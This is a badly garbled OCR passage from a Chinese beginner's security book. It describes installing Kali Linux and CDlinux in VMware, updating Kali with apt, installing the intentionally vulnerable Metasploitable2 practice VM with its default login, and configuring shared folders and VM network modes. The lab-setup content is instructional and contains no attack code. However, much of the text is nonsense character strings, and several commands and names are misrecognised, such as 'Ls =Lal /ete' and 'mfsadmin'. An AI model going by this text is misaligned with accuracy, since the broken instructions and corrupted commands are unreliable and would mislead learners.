[se 图 按 Enter 键 ， 进 入 文件 分 区 界面 ， 这 里 
保持 默认 设置 ， 如 下 图 所 示 。 
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选 定 要 分 区 : 
SCcSI1 (0,0,0) (sda) - VMware, VMware Virtual S: 42.9 GB 


该 磁盘 可 以 使 用 以 下 数 种 不 同方 式 来 进行 分 区 。 如 果 您 不 确定 ， 请 选择 第 一 个 
分 区 方案 : 


将 所 有 文件 放 在 同一 个 分 区 中 (推荐 新 手 使 用 ) 


将 /home 放 在 单独 的 分 区 
将 /home、/var 和 / 必 mp 都 分 别 放 在 单独 的 分 区 


进入 分 区 确认 界面 ， 如 下 


step 较 按 Enter 键 ， 
图 所 示 。 


有 和 已 后 们 各 ， 册 过 必 于 [多 引 、 旭 可 上 可， 生字， 
个 六 和 则 比 有 妥 匠 

per 

WuD m 

ET 

on 和 

en iscsie 


SCSH gl (sda) -42.9 68 VMw 
1 和 8 
1 R60 


按 Enter 键 ， 


进入 格式 化 分 区 界面 ， 选 
择 “ 是 ” 单 选 按钮 ， 如 下 图 所 示 。 


如 果 您 继 绩 ， 以 下 所 列 出 的 修改 内 容 将 会 写 入 到 磁盘 中 。 或 者 ， 您 也 可 以 手动 来 进行 其 它 修改 。 


以 下 设备 的 分 区 表 已 改变 
SCSI1 (0,0,0) (sda) 


以 下 分 区 将 被 格式 化 
SCSI1 (0,0,0) (sda) 设备 上 的 第 1 分 区 将 设 为 ext4 
SCSI1 (0,0,0) (sda) 设备 上 的 第 5 分 区 将 设 为 swap 


将 改动 守信 玉 组曲 
口 析 
加 区 


按 Enter 键 ， 进 入 配置 软件 包 管 理 器 界 
面 ， 这 里 保持 默认 设置 ， 如 下 图 所 示 。 
网 络 镜像 可 以 用 来 补充 光盘 所 带 的 软件 ,也 可 以 用 来 提供 较 新 版 本 的 软件 。 
使 用 网 结 措 仿 吗 ? 


9 用 
回 是 


step 图 按 Enter 键 ， 进 入 是 否 使 用 代理 上 网 界 
面 ， 设 置 保持 默认 设置 ， 如 下 图 所 示 。 
如 果 您 需要 用 HTTP 代理 来 连接 外 部 网 络 ， 请 在 此 输入 代理 信息 ， 否 则 ， 请 和 置 空 , 


代理 信息 应 按照 http://[[ 用 户 名 ]{: 密 码 ]@] 主 机 名 [: 端 口 ]/” 的 标准 格式 给 出 。 
HTTP 代理 信息 (如 黑 没 有 请 留守 : 


l 


step 图 按 Enter 键 ， 进 入 将 GRUB 安 装 至 硬盘 
界面 ， 保 持 默认 设置 ， 如 右上 图 所 示 。 
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RU 局 相 果 开本 一 的 主导 中 
ae 上 


和 -当世 则 大半 和 人 所 机 上 全 到 已 在 的 其 人 拓 人 和 线 ， 朱 主 5 司 兴 和 动作 条 对 簿 全 站 作 和 过 天 法 让 人 是， 冤 以 表 
Ru: 


step 图 按 Enter 键 ， 进 入 选择 引导 路 径 界 面 ， 


习 “/dev/sda” 选 项 ， 如 下 图 所 示 。 


CEIRTTOTTITECTTITTORCROTECCOUTTTRCOTOETT 
和， 可 以 条 GRU 雪夫 志方， 志和 天 地 押 动 者 上 ， 择 皇 以 到 一 上 
a 


step 图 按 Enter 键 ， 进 入 完成 安装 ， 提 示 用 户 
重启 进入 系统 ， 如 下 图 所 示 。 


step 图 按 Enter 键 ， 安 装 完成 后 重启 ， 进 入 用 
户 名 界面 ， 在 其 中 输入 root 管 理 员 账号 ， 如 
下 图 所 示 。 


单 击 “ 下 一 步 ”按钮 ， 进 入 登 
界面 ， 在 其 中 输入 设置 好 的 管理 员 
如 下 图 所 示 。 


录 密 码 
密码 ， 


[step 图 单 击 “登录 ”按钮 ， 至 此 便 完 成 了 
整个 Kail Linux 系 统 的 安装 工作 ， 如 下 图 
所 示 。 


3.2.3 更 新 Kali Linux 系 统 


初始 安装 的 Kali Linux 系 统 如 果 不 及 
时 更 新 是 无 法 使 用 的 ， 下 面 介绍 更 新 Kali 
Linux 系 统 的 方法 与 步骤 。 
双击 桌面 上 Kali Linux 系 统 的 终端 黑 
色 图 标 ， 如 下 图 所 示 。 


打开 Kali Linux 系 统 的 终端 设置 界 
面 ， 在 其 中 输入 命令 apt update， 然 后 按 
Enter 键 ， 即 可 获取 需要 更 新 软件 的 列表 ， 
如 下 图 所 示 。 

root@kalk: - ee 
ee | 


病 中 +1 http://nirrors.neusoft.edu.cn/kalt kali-rolling IrRelease 
正在 读 取 钦 件 亿 列表 , ,， 完 成 


--upgradabte 来 要 看 它们 


获取 完 更 新 列表 后 如 果 有 需要 更 新 
en 可 以 运行 apt upgrad 命 令 ， 如 下 图 
所 示 。 


上 
美的 闪 且 时 在 不 于 吐 了 


全 用 ,apt autarenove, 亲 首府 它 ( 安 们 )- 


四 


step 贺 运行 命令 后 会 有 一 个 提示 ， 此 时 按键 
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盘 Y 键 ， 即 可 开始 更 新 ， 更 新 中 状态 如 下 图 
所 示 。 


丘 亚 可 村 可 一-719-TIB51 
正在 将 tibgj569 (1.5204-1) 藤 包 到 (3.32.3.2) 上 
正 港 备 解 包 .../11-9js_ 1.52.4-1_ amd64.deb 

正在 将 9js 和 52-4-1] 解 包 到 (1.52.3-2) 上 

正 淮 骂 解 包 .../12-gnowe-user-docs 3.39.1-1 all.deb 

匡 在 将 gnone user-dcs (3.39.1-1) 解 包 到 (3.39.9-1) 上 


E 


侈 注意 : 由 于 网 络 原因 可 能 需要 多 执行 几 
次 更 新 命令 ， 直 至 更 新 完成 。 另 外 ， 如 果 
个 别 软 件 已 经 安装 并 存在 升级 版 本 问题 ， 
扣 下 图 所 未 。 


这 时 ， 可 以 先 印 载 旧版 本 ， 运 行 “apt- 
get remove < 软件 名 >” 命 令 ， 如 下 图 所 示 ， 
此 时 按键 盘 上 的 了 键 即 可 卸载 。 


FotaRRUE- apt- get remove wpscan 
正在 恋 昭 软件 自 列 表 ,,， 完 所 


下 列 软 件 旬 是 自动 安 潜 的 并 且 理 甘 不 需要 了 
ruby-ethon ruby-+fi ruby- ruby-progressbar ruby-terminal-table ruby-typhoeus 
ruby-unicode-display-width ruby-yajl 

硬 用 "apt aurorenmove' 来 知性 亡 (它们 )， 

下 列 软件 包 移 被 【部 散 】 
wati-tinux-futL wpscan 

升 豚 了 9 个 软件 包 ， 新 安装 了 3 个 软件 包 ,要 利用 2 个 软件 介 ,有 9 个 软件 得 来 被 升级 。 

喇 压 电 后 将 会 吾 出 267 kB 的 衬 间 。 

您 站 里 她 披 执行 吗 ? IY/n] y 


卸载 完 旧 版 本 后 ， 可 以 运行 “apt-get 
install < 软件 名 >” 命 令 ， 如 下 图 所 示 ， 此 时 
按键 盘 上 的 Y 键 即 可 开始 安装 新 版 本 。 


Foonat LF pT- gat INSTATL whSCan 
正在 读 蛛 软件 包 列 表 ,. ， 完 成 


下 列 软 件 外 是 日 动 受 革 的 并 且 再 在 不 需要 了 
ruby-terminal-table ruby-unicode-display-width 
月 ,apt autorewove' 来 郑 教 它 (它们 ) 
将 会 同时 安 芭 下列 软 件 
ruby-cms-scanner ruby-opt-parse-validator ruby-progressbar 
下 列 软件 外 将 被 【 邵 载 】 
ruby- ruby-progressbar 
下 列 【 新】 软件 忆 将 礼 安装 
ruby-cms-5canner ruby-opt-parse-vatidator ruby-progressbar wpscan 
天 级 了 日 个 歇 征 和 锯 ， 新 实 汶 了 4 个 软件 旬 ,要 仓 我 1 个 次 件 包 ,有 8 个 软件 包 未 被 航 ， 
| 忆 亚 不 如 6 By112 KB 的 站 仁 。 
顺 于 志 后 会 消 疆 594 kB 的 国外 空间 - 
你 而 显 经 续 执 行 码 7 TY/n] y 


最 后 ， 再 次 运行 apt upgrade 命 令 ， 如 
果 显 示 无 软件 需要 更 新 ， 此 时 系统 更 新 完 
成 ， 如 下 图 所 示 。 


[Foorakalr Fapt_ upgrade 
正在 读 取 软件 包 列表 . .. 充 成 


下 列 软件 包 是 自动 安装 的 并 且 现 在 不 需要 了 ; 
ruby-terminal -table ruby-unicode-display-width 
全 用 'apt autorenove' 末 到 载 它 (它们 )。 
升级 了 9 个 软件 包 ， 新 安装 了 日 个 软件 包 ， 要 种 闵 9 个 软件 名, 有 9 个 软件 包 未 被 升级 。 


3.3 ”安装 CDlinux 系 统 


CDlinux 是 一 种 小 型 的 迷你 GNU/Linux 
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哆 3.3.1 


SS 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


发 行 版 软件 ， 其 名 称 取 自 英文 的 Compact- 
DistroLinux。CDlinux 的 体形 小 巧 ， 功 能 却 
很 强大 。 
CDlinux 简 介 
使 用 者 可 以 把 CDlinux 看 作 是 一 个 “ 移 
动 操作 系统 ”， 把 它 装 到 随身 U 盘 中 ， 无 
论 走 到 哪里 ， 只 要 是 能 支持 U 盘 启动 的 计 
算 机 ， 就 可 以 插 上 U 盘 来 启动 CDlinux 操 
作 系 统 ， 从 而 把 这 台 计 算 机 变 成 自己 的 移 
动工 作 站 。 

CDlinux 里 集成 了 最 新 的 Linux 内 核 、 
Xorg 图 形 界面 、Xfce 窗 口 管 理 器 以 及 很 多 
其 他 流行 软件 ， 如 Firefox 浏 览 器 、Pidgin 即 
时 通信 程序 、GIMP 图 像 处 理 程 序 等 ， 这 就 
使 得 移动 工作 更 加 方便 。 

另外 ， 还 可 以 把 CDlinux 当 作 一 件 
随身 的 系统 修复 /维护 工具 。 这 是 因为 在 
CDlinux 标 准 版 里 集成 了 大 量 的 系统 修复 / 
维护 工具 ， 如 parted、partimage、part- 
clone、testdisk、foremost 等 ， 使 用 这 些 工 
具 完 全 可 以 满足 日 常 系统 维护 /修复 工作 的 
需要 。 

目前 ，CDlinux 对 简体 中 文 提供 全 面 支 
持 ， 这 极 大 地 方便 了 使 用 中 文 的 用 户 。 


六 3.3.2 配置 CDlinux 
:创建 CDlinux 虚 拟 机 需要 以 下 几 个 
步骤 ; 

[sep 国 单 去 VMware 虚拟 机 在 主页 中 有 “ 创 
建新 的 虚拟 机 ”按钮 ， 如 下 图 所 示 。 


| WORKSTATION 14 PRO™ | 
+ 四 的 
创建 新 的 虚拟 机 打开 虚拟 机 连接 远程 服务 器 


[Stes 图 进入 新 建 虚 拟 机 向 导 对 话 框 选择 “ 典 
型 (推荐 ) ” 单 选 按钮 ， 如 右上 图 所 示 ， 
单 击 “ 下 一 步 ” 按 钮 。 
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欢迎 使 用 新 建 庶 拟 机 问 导 


人 新 记 使 朋 计 么 关 开交 机 王 ? 


加 夫 型 推荐 )(T) 


DO 姑 过 JL 个 词 区 志 损人 Workctaaan 14x 
二 


OKO) 
村 
A DE 产品 莱 从 性 等 记名 二 而 


E23 上 -$n 也 消 


[step 图 在 “安装 客户 机 操作 系统 ”对 话 框 
中 ， 选 择 “ 安 装 程序 光盘 映 象 (iso) ” 单 
选 按 钮 ， 并 为 其 添加 CDlinux 光 盘 文 件 ， 如 
下 图 所 示 ， 单 击 “ 下 一 步 ” 按 钮 。 
ET 


客户 机 氛 作 系统 
庶 池 机 如 同 档 理 册 ， 需 要 操作 系统 * 您 构 如 何 安装 客户 机 操作 系 撤 ? 
Ee 


Bd bl 


元 梧 用 虹 直 


加 寺 程序 光 季 吉文 半 (soXH: 
eleanordeDown oa\ CDI 0 9.7.1_Chsoc_ SSE ~| 
熏 ” 无 法 检 出 此 光盘 丰 保 中 有 的 提 作 币 统 。 
各 要 要 描 定 要 友 装 的 迭 作 系 拘 * 


口 A 安装 接 作 系统 (5)， 
的 虚拟 记 村 也 合 一 个 空白 研 盘 。 


Ld < 上 -#(6) 下 -上 (MN)> 了 请 


[step 园 在 “选择 客户 机 操作 系统 ”对 话 
框 中 选择 Linux 选 项 ， 版 本 中 选择 “其 他 
Linux2.6x 内 核 ”， 如 下 图 所 示 ， 单 击 “ 下 
一 步 ” 按 钮 。 


选 释 容 户 机 操作 系统 
此 过 拟 机 赴 村 安 半 于 各 返 作 系统 ? 


新 本 (V) 
其 他 Unix26x 启 核 


有 < 上 (0) 


Step 图 在 “命名 虚拟 机 ”对 话 框 中 单 击 “; 
览 ” 按 钮 ， peg bp 
如 下 图 所 示 ， 单 击 “ 下 一 步 ” 按 钮 。 


TW>] 了 


新 建 虚拟 


命名 虚拟 机 
您 希望 该 虚拟 机 使 用 什么 名 称 ? 


虚拟 机 名 称 (V): 
[基地 Unux2.6x 术 


位 置 (U: 
IE 


在 "编辑 "> 首选 顺 "中 可 更 欢 默认 位 置 。 


< 上 一 步 (8) 下 一 步 (N) > 取消 


ep 国 “指定 磁盘 容量 ”界面 保持 默认 即 
可 ， 如 下 图 所 示 ， 单 击 “ 下 一 步 ” 按 钮 。 


指定 磁盘 窒 旦 
磁盘 大 小 为 多 少 ? 


虚拟 机 的 硬盘 作为 一 个 或 条 个 文件 存 请 在 主机 的 物理 磁盘 中 。 这 些 文件 最 初 很 小 ， 随 着 您 
向 虚拟 机 中 添加 应 用 程序 、 文 件 和 数据 而 到 产 灾 大。 


最 大 磁盘 大 小 (GB)(S): 


针对 其 他 Unux 2.6.x 内 校 的 建议 大 小 : 8 GB 


口 将 虚拟 说 盘存 储 为 单个 文件 (0) 
转 将 虚拟 磋 盘 拆 分 成 条 个 文件 (M) 
es 可 以 更 径 松 地 在 计算 机 之 间 移 动 虚 拟 机 ， 但 可 能 会 降低 大 容量 说 盘 的 性 
Eo 


部 助 < 上 — 上 (8) 取消 
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step 国 在 配置 好 的 虚拟 机 启动 界面 ， 单 击 
“开启 此 虚拟 机 ”按钮 ， 启 动 虚拟 机 ， 如 
下 图 所 示 。 


其 他 Linux 26x 内 核 


step 图 在 虚拟 机 启动 过 程 中 可 以 选择 语言 环 
境 ， 如 下 图 所 示 。 


step 国 至 此 便 配 置 好 了 CDlinux 系 统 ， 如 
下 图 所 示 ， 单 击 “ 完 成 ”按钮 完成 虚拟 机 
创建 。 


已 准备 好 创建 虚拟 机 
单 击 ` 完 成 “ 创 尘 虚拟 机 。 然 后 可 以 安装 其 他 Linux 2.6x 内 核 。 
将 使 用 下 列 设置 创建 虚拟 机 : 
名 称 : 其 他 Unux 2.6x 内 核 
位 置 : E:\CDinux 
版 本 : Workstation 14.x 
操作 系统 : 其 他 Lnux 2.6.x 内 核 
8 GB, 拆 分 
256 MB 


NAT 
CD/DVD, USB 控制 器 , 打印 机 , 声卡 


自 定义 硬件 (C)… 


< 上 - 步 (B) 完成 取消 


rp 


二 三 昌 县 画 - | 时 


3.4 安装 与 使 用 靶 机 
拿 到 局 域 网 权限 后 需要 后 续 的 渗透 


:2 
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测试 ， 这 里 选取 一 款 比 较 好 的 靶 机 一 一 
Metasploitable2， 该 对 机 中 包含 了 大 量 的 系 
统 漏洞 ， 用 户 使 用 该 靶 机 不 仅 可 以 做 日 常 
的 无 线 网 络 安全 练习 ， 还 可 以 提高 自身 的 
安全 技术 。 


办 3.4.1 认识 靶 机 


Metasploitable 漏 洞 演练 系统 ， 是 基于 
ubuntu 操作 系统 ， 本 身 设计 作为 安全 工具 测 
试 和 演示 常见 漏洞 攻击 ， 它 的 作用 是 用 来 
作为 MSF 攻 击 用 的 靶 机 ， 它 是 一 个 具有 无 
数 未 打 补 丁 漏洞 与 开放 了 无 数 高 危 端口 的 
渗透 演练 系统 ， 可 以 使 我 们 进行 练习 。 

在 网 络 中 攻击 现实 中 的 主机 是 一 种 违 
法 行为 ， 一 旦 被 对 方 发 现 可 能 会 遭受 被 起 
诉 的 风险 。 因 此 使 用 Metasploitable 系 统 来 练 
习 ， 不 但 可 以 更 加 直观 地 感受 漏洞 利用 的 过 
程 ， 还 可 以 学 会 如 何 修补 防御 这 些 漏洞 。 


咎 3.4.2 “安装 疲 机 


| 目前 Metasploitable 已 经 推出 3 个 系 
列 ， 这 里 选用 Metasploitable2。 下 载 并 安装 
Metasploitable2 的 操作 步骤 如 下 : 

在 浏览 器 中 输入 http://sourceforge.net/ 
projects/metasploitable/files/Metasploitable2/ 
网 址 ， 在 打开 的 页 面 中 找到 下 载 页 面 ， 如 


下 图 所 示 。 

Download Latest Version 
[step 图 单 击 下 载 页 面 中 的 下 载 按钮 ， 并 选择 
软件 的 保存 路 径 ， 下 载 完成 后 会 有 一 个 名 
为 “metasploitable-linux-2.0.0.zip” 的 压缩 
包 文件 ， 下 图 为 打开 压缩 包 的 状态 。 


| 站 measpaiablino 200zPWeaspoiablez-Unm 


metasploitable -linux-2.0.0.zip (873.1 MB) 


lam + 大 小 


上 1868 
ss 


[step 图 将 该 压缩 包 文件 解压 到 磁盘 当中 ， 双 
击 打 开 该 目录 ， 查 看 解压 后 的 文件 是 否 缺 
少 ， 如 右上 图 所 示 。 


EDT 
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全 注意 : 这 里 存放 的 路 径 是 创建 虚拟 机 后 
的 路 径 ， 因 此 选择 一 块 空间 充足 并 且 便于 
记忆 的 位 置 。 


[Step 加 打开 wmware 虚 拟 机 ， 进 入 虚拟 机 的 
主 界面 ， 如 下 图 所 示 。 


WORKSTATION 14 PRO 


+ 加 的 


创建 新 的 虚拟 机 打开 虚拟 机 连接 远程 服务 器 


A 


单 击 “ 打 开 虚 拟 机 ”按钮 ， 打 开 “ 打 
开 ” 对 话 框 ， 在 其 中 找到 解压 目录 ， 如 下 
图 所 示 。 


让 织 ” 吉首 文件 夫 -mm 全 


Metasploiioble. rm 


文人 IN 所 有 1 的 文件 


Ca 
[Eee 国 选中 目录 中 的 虚拟 机 文件 ， 单 击 “ 打 
开 ” 按 钮 ， 这 样 便 创建 好 了 虚拟 机 ， 如 下 
图 所 示 。 


FMetasploitable2-Linux 


取消 


天 Bee 有 


[step 图 单 去 “开启 此 虚拟 机 ”按钮 ， 会 弹出 
一 个 对 话 框 ， 如 下 图 所 示 。 


Metasploitable2-Linux - VMware Workstation 

@ 此 虚拟 机 可 能 已 被 移动 或 夏 制 
为 了 配置 特定 的 管理 和 网 络 功能 ，VMware Workstation 震 要 知 
才 是 否 已 移动 或 复制 了 此 和 虚拟 机 。 
如 果 您 不 知道 ， 请 回答 我 已 复制 该 虚拟 机 (P) ”。 


我 已 移动 该 虚拟 机 (M) 到 清 
step 图 单 击 “我 已 移动 该 虚拟 机 ”按钮 ， 启 
动 Metasploitable2， 这 样 就 完成 了 靶 机 的 安 
装 ， 如 下 图 所 示 


斧 注 意 : 虚拟 机 镜像 创建 的 虚拟 机 默认 账 
号 和 密码 均 为 mfsadmin， 可 以 通过 passwd 
命令 修改 密码 。 


登录 进 虚 拟 机 以 后 建议 更 改 该 初始 密 
码 ， 修 改 密码 使 用 passwd msfadmin 命 令 ， 
输入 完 命令 后 会 要 求 输入 原始 密码 ， 原 始 
密码 输入 正确 后 会 要 求 输入 新 密码 ， 输 入 
两 次 一 样 的 密码 后 表示 修改 密码 完成 ， 如 
下 图 所 示 。 


:~9 passud msfadmir 


new UNIX passuo 
st choos 
Enter new UNIX password: 


You mt a long 


倍 注 意 : Linux 系 统 中 输入 密码 是 不 显示 
的 ， 直 接 输入 即 可 ， 不 要 以 为 没有 输入 ， 
另外 ， 如 果 输 入 密码 过 短 系统 也 会 提示 要 
求 输入 一 个 较 长 的 密码 。 


3.4.3” 靶 机 的 使 用 


靶 机 安装 完成 后 ， 就 可 以 使 用 该 靶 机 
了 ， 使 用 方法 非常 简单 。 启 动 虚拟 机 后 ， 
靶 机 系统 也 会 启动 ， 这 样 用 户 就 可 以 使 用 
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各 种 扫描 工具 来 扫描 靶 机 中 的 系统 漏洞 ， 
进入 演示 使 用 漏洞 攻击 系统 的 过 程 。 


3.5 ”实战 演练 

实战 演练 1 一 一 设置 Kail 与 主机 共享 文件 夹 
通过 安装 虚拟 机 工具 设置 Kali 与 主机 实 

现 共享 文件 ， 具 体操 作 步 又 如 下 : 

[see 加 在 VMware 工具 栏 中 ， 选 择 “ 虚 拟 

机 ”菜单 项 ， 在 弹出 的 菜单 列表 中 选择 

“设置 ”菜单 命令 ， 如 下 图 所 示 。 

Il ~ 


虚拟 机 (M)” 远 项 卡 (T) 帮助 (H) 
(D 电源 (P) 
可 移动 设备 (D) 


暂停 (U) Ctrl+Shift+p 


发 送 Ctrl+Ak+ Del(E) 
抓 取 给 入 内 容 () Ctrl+G 
全 快照 (IN) 
捕获 屏幕 ( 〇 
A Ee(M) 
取消 VMware Tools 安装 (T) 


>) ES).. 


Ctrl+Alt+PrtScn 


NS Ctrl+D 


打开 “虚拟 机 设置 ”对 话 框 ， 选 择 
“选项 ”选项 卡 ， 并 在 “设置 ”列表 中 选 
择 “ 共 享 文件 夹 ” 选 项 ， 如 下 图 所 示 。 


3 Wn 3 


[es 图 单 去 “添加 ”按钮 ， 弹 出 “添加 共享 
文件 天 向 导 ” 对 话 框 ， 如 下 图 所 示 。 
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黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 ( 超 值 版 ) 


欢迎 使 用 沃 加 共享 文件 夹 问 导 


此 向 导 稳 引导 您 完 胸 向 虚拟 机 添加 新 共享 文 
件 到 的 步骤 。 
WORKSTATION 


4 


< 上 ~#(8 取消 


[step 国 单 直 “下 一 步 ” 按 钮 ， 在 打开 的 “ 命 
令 共 享 文件 夹 ” 对 话 框 中 输入 文件 夹 名 
称 ， 并 选择 一 个 共享 文件 夹 路 径 ， 如 下 图 
所 示 。 


命名 共享 文件 来 
如 何 命名 此 共享 文件 夹 ? 
主机 路 径 (H) 
Ee El 
名 称 (A) 


[Graveor 


< 上 - 步 (8) 下 - 步 (N)> 取消 


单 击 “ 下 一 步 ” 按 钮 ， 进 入 “指定 
共享 文件 天 属性 ”对 话 框 ， 指 定 共享 文件 
夹 属性 ， 也 可 以 保持 默认 设置 ， 最 后 单 击 
“完成 ”按钮 ， 完 成 共享 文件 夹 的 设置 操 
作 ， 如 下 图 所 示 。 


指定 共享 文件 去 属性 
指定 此 共享 文件 夹 的 范围 。 


其 他 属性 
回 启用 此 共享 (E) 
口 只 次 (R) 


< 上 = 上 四 ) en 
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step 国 在 VMware 菜单 中 选择 “虚拟 机 ” 菜 


单项 ， 在 弹出 的 菜单 列表 中 选择 “重新 安 
装 VMware Tools” 选 项 ， 如 下 图 所 示 。 


Eu 
(D 电源 P) > 
) 可 移动 设备 (D) > 
著 停 (U) Ctrl+Shift+p 


号 SR 送 Cal+Ak+DelB) 
抓 取 控 入 内 容 四 Ctrl+G 


加 NV » 
捕获 屏幕 ( 品 Ctrl+Alt+PrtSen 


管理 (M) > 


名 设置 (S).. Ctl+D 
此 时 会 在 Kali 虚 拟 机 中 弹出 一 个 安装 
光盘 ， 打 开光 盘 后 ， 里 面 会 有 5 个 文件 ， 如 
下 图 所 示 。 


<， OVvMwareTos - alj=-lsaeoe 
站 Recent 
让 Starred Ea 1 
A Home 8 
manifest bt run-upgrader sh VMwareTools- 
Deskop 102.5-8068393 tar. 
yr 
D Documents 
四 Downloade Ee = 
£1 Music 三 : = 
白 pures ymware-tools- ymware-tools- 
upgader-32 Upgrader-64 
日 vdeos 
Trash 


Estee 加 复制 压缩 包 文件 “VMwareTools- 
10.2.5-8068393.tar.gz” 到 Downloads 目 录 
下 ， 如 下 图 所 示 。 


< > QHome [oom 


EIOIEEIEIEEE 


站 Recent FE 
去 Starred 站 

合 Home TGZ 

VMwareTools- 
天 Desaop 1025-80683934ar 
对 

D Documents 
rr 

fA Music 

Pictures 

日 Videos 

@ Trash 
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[Es 国 选中 压缩 包 文件 ， 右 击 ， 在 弹出 的 快 
捷 菜单 中 选择 “提取 到 此 处 ”菜单 命令 ， 
如 下 图 所 示 。 


国 用 归档 管理 器 打开 回 计 
使 用 其 他 程序 打开 (A) 
蔓 切 中) ctrtxX | 
复制 (C) 
移动 到 .。 
复制 到 
移 到 回收 站 人 删除 | 
重 命名 (M).. F2 
提取 到 此 处 {E) | 
提取 到 多 ).。 
压缩 O)- 
收藏 

属性 (R) Ctrl | 


开始 解压 文件 夹 ， 解 压 完成 后 ， 在 内 


部 发 现 一 个 vmware-install.pl 文 件 ， 如 下 图 
所 示 。 


| ¢ ，| wwarero.s-s06039’ RS =- -|= eeooe 
站 而 近 使 用 

:如 和 面 面 
全 主 日 录 

bm af oc 

和 

DY Documents = 

四 Downloads Ea 

A Musie eic FuEs INSTALL 
站 Petures 
= 
es aaater 四 wuth 
© vMwareToo， a 

+ 其他 位 置 #1 


vmware-install pl 


[step 了 图 光标 移动 到 文件 夹 空白 区 域 ， 右 击 ， 
在 弹出 的 快捷 菜单 中 选择 “在 终端 打开 ” 
菜单 命令 ， 如 下 图 所 示 。 

新 建文 件 夹 (F) ShifttCtrttN | 

粘贴 (P) 

全 选 (A) Ctrlt+A 

属性 (R) 

在 终端 打开 (E) | 


step 了 图 这 时 在 终端 中 执行 ./ vmware-install.pl 
命令 ， 下 图 为 执行 效果 。 


SC 


he installer has detected an existing install 
1s System and will not attenpt to renove | 

pplications. It 1s reconmended to use 1 so 

he operating systen. If you do not want to use the ex 

spen -wm-tools packages and use VMvare Tools, you ust uninstall the 

pen-wm- tools packages and re-run this nstat 

me packages that need to be renove 

ppen-wm- tools 


packages must be removed with the --purge option 
next check 1f there are any nissing kernel drivers. Type yes 
you want to do this, otherwise type no [yesl y 


第 3 章 ”搭建 无 线 测 试 系统 Kali Linux 


[step 图 如 果 安 装 过 程 中 提示 [yes] ， 按 键 
盘 上 的 Y 键 或 Enter 键 直到 安装 完成 ， 安 装 完 
成 后 ， 在 mnt 目 录 中 会 多 出 一 个 共享 文件 夹 
hgfs， 如 下 图 所 示 。 


root@kali:/# cd mnt 
root@kali:/mnt# ls 

hgfs 

root@kali:/mnt# cd hgfs 
root@kali:/mnt/hgfs# ls 


root@kali:/mnt/hgfs# cd ShareDir/ 
root@kali:/mnt/hgfs/ShareDir# | | 


实战 演练 2 一 一 设置 Kali 虚 拟 机 的 上 网 
方式 

Kali 虚 拟 机 可 以 设置 3 种 网 络 模式 ， 设 
置 上 网 方式 的 操作 步骤 如 下 : 


step 回 在 VMware 菜单 项 中 ， 选 择 “ 庶 拟 
机 ”一 “网 络 适配器 ”一 “设置 ? 菜单 命 
令 ， 如 下 图 所 示 。 


JE 一 nm wom | | S| 


Com sl Es Me) 


WO gm » Bo Fe 
CI 区 coovotl > 

em shh Cor 
SS oD 

Emon he 
a Mero 


rm 


打开 “虚拟 机 设置 ”对 话 框 ， 在 其 中 
选择 “网 络 适 配器 ”选项 ， 在 右 侧 可 以 看 
到 “网 络 连 接 ” 设 置 界面 ， 这 里 提供 的 连 
接 方式 有 3 种 ， 如 下 图 所 示 。 


Wt 

| 晤 二 和 和 
[ea 4 
Dea 4 回 二 6 扩 才 (0) 
SR (ScD 


EE 
记叙 御 Dprogan Fies 。 同时 二 
OW) 
Sue a 
所 的 栓剂 图 AT 入 式 (N): 骨 和 基地 主机 的 大 地 址 
OREM SE 
ON) He 
Vmnet (aii) 
OL ERY 


[3 


CC] 区 | 


3 种 网 络 连接 方式 介绍 如 下 : 


上 


黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 ( 超 值 版 ) 


(1) 桥接 模式 。 如 果 选 择 该 连接 模式 ， 
虚拟 机 可 以 获取 独立 的 人 地址， 通过 独立 
IP 地址 进行 上 网 。 

(2) NAT 模式。 如 果 选 择 该 连接 模式 ， 
虚拟 机 将 与 主机 公用 一 个 他 地 址 ， 通 过 主 
机 人 P 地 址 实现 NAT 转换 上 网 。 

(3) 仅 主 机 模式 。 如 果 选 择 该 连接 模 
式 ， 虚 拟 机 仅 同 主机 进行 通信 ， 不 能 接 入 
Intenet 外 网 。 
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3.6 ”小 试 身手 
练习 1: 下 载 并 安装 虚拟 机 软件 。 
练习 2: 下 载 并 安装 Kali 虚 拟 机 ， 同 时 
更 新 Kali 虚 拟 机 到 最 新 。 

练习 3: 配置 CDliunx 虚 拟 机 ， 并 运行 
CDliunx 进 入 桌面 。 

练习 4: 安装 并 运行 Metasploitable 靶 机 


第 4 音 


熟悉 无 线 网 络 安全 测试 平 


台 一 一 Kali Linux 系 统 的 基本 操作 


大 多 数 无 线 黑客 都 会 选择 Kali Linux 作 为 测试 平台 ， 这 是 因为 大 部 分 无 线 黑客 工具 都 
是 基于 Kali Linux 系 统 环境 下 的 。 本 章 介 绍 Kali Linux 操 作 系 统 的 基本 操作 ， 主 要 包括 Kali 
Linux 系 统 下 的 命令 格式 、 管 理 文件 和 目录 命令 、 文 件 内 容 查 看 命令 、 权 限 分 配 操作 命 


4.1 Kali Linux 系 统 下 的 命令 
格式 


Kali Linux 命 令 格 式 同 DOS 命 令 格式 类 
似 ， 不 过 Kali Linux 命 令 是 区 分 大 小 写 的 ， 这 
一 点 需要 注意 。Kali Linux 命 令 格 式 如 下 : 

命令 [- 选 项 ] [参数 ] 

例如 : 

Ls =Lal /ete 


该 命令 行 中 使 用 了 ls 命令， 并 且 选 用 
了 -l 选 项 与 -a 选项， 多 个 选项 写 在 一 起 ， 后 
面 /etc 作 为 一 个 参数 传 入 进来 ， 得 到 一 个 完 
整 的 命令 行 。 

另外 ， 在 使 用 Kali Linux 命 令 时 ， 需 要 
注意 以 下 事项 : 

(1) 有 一 些 个 别 命令 的 使 用 不 遵循 此 
格式 。 

(2) 当 有 多 个 选项 时 ， 可 以 写 在 一 起 。 


(3) 简化 选项 与 完整 选项 。 例 如 ，-a 


等 于 -all。 

(4) 存在 不 加 选项 单独 执行 的 命令 。 
例如 : cd /etc， 使 用 了 cd 命令， 并 没有 加 
入 选项 ， 此 时 /etc 依然 作为 参数 使 用 ， 得 到 
一 个 完整 命令 。 还 有 top， 使 用 top 命令 ， 
并 没有 选取 任何 选项 以 及 参数 ， 但 即使 这 
样 它 依然 是 一 条 完整 的 命令 。 

由 此 可 以 看 出 Kali Linux 的 命令 可 以 
选择 加 入 一 些 选 项 及 参数 ， 也 可 以 独立 运 
行 ， 取决 于 实际 选择 的 命令 。 


管理 文件 和 目录 命令 


管理 文件 和 目录 的 命令 是 Kali Linux 系 
